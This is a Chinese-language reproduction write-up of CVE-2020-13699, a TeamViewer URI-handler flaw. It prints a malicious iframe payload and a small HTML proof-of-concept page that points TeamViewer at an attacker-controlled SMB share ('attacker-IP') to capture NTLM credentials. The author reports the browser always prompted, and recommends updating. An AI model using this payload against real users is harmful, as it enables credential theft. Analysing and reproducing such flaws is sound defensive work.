Windows版TeamViewer漏洞复现

摘要

Windows版TeamViewer被暴高风险漏洞，可能被远程攻击者利用来破解用户的密码，从而导致进一步的系统利用。

TeamViewer 官方发布漏洞修复消息

TeamViewer是一个可用于Microsoft Windows、macOS、Linux、Chrome OS、iOS、Android、Windows RT、Windows Phone 8和黑莓操作系统等的远程控制软件。除了远程控制外，TeamViewer还包含合同协作与示范等功能。

近日TeamViewer团队发布了8-15的全版本的软件推送，在官方发布的安全公告中，修复了CVE-2020-13699漏洞。该漏洞使得程序无法正确引用其自定义URI处理程序，导致攻击者可以通过构建恶意的URI，通过精心制作URL将恶意的iframe嵌入到网页中。

<iframe src='teamviewer10: --play \attacker-IPsharefake.tvs'></iframe>

       根据安全研究人员 Jeffrey Hofmann的描述，该恶意的iframe会启动系统的TeamViewer，并启动SMB的共享，从而触发一个SMB认证攻击（Windows在打开SMB共享时将执行NTLM身份验证，并且可以将请求进行转发），攻击者可以利用窃取到的凭证对受害者主机和网络资源进行认证。

危害版本

根据安全研究人员的分析受到漏洞影响的版本如下

TeamViewer8 < 8.0.258861
TeamViewer9 < 9.0.258860
TeamViewer10 < 10.0.258873
TeamViewer11 < 11.0.258870
TeamViewer12 < 12.0.258869
TeamViewer13 < 13.2.36220
TeamViewer14 < 14.2.56676, 14.7.48350
TeamViewer15 < 15.8.3

漏洞复现

构建用户不能轻易察觉的iframe，所以将恶意的iframe的大小设置成1px*1px，

<!DOCTYPE html>
<html>
<head>
    <title>cve-2020-13699</title>
</head>

<body>
    <p>Welcome to ChaMd5!</p>
    <iframe style="height:1px;width:1px;" src='teamviewer10: --play \attacker-IPsharefake.tvs'></iframe>
</body>
</html>

根据精心构建的iframe后，本人分别在Windows7/Windows10平台使用IE8/Chrome84/Edge浏览器，同时使用TeamViewer8/10/14/15进行复现，但是当用户访问攻击者主恶意构建的URI时，浏览器并不会后台静默启动TeamViewer，而是会提示当前用户远端启动应用的通知。

本人经过多次实验并未发现不提示用户而静默启动的情况出现，即当应用启动时，用户一定可以收到远端启动应用的通知，所以本人认为在用户不误操作的情况下可以拒绝恶意启动的TeamViewer应用。

修复建议

根据官方声明，现已发布修复该漏洞的最新版本，请大家及时更新到TeamViewer的最新版本。

参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2020-13699

• https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

• https://jeffs.sh/CVEs/CVE-2020-13699.txt

• https://www.helpnetsecurity.com/2020/08/06/cve-2020-13699/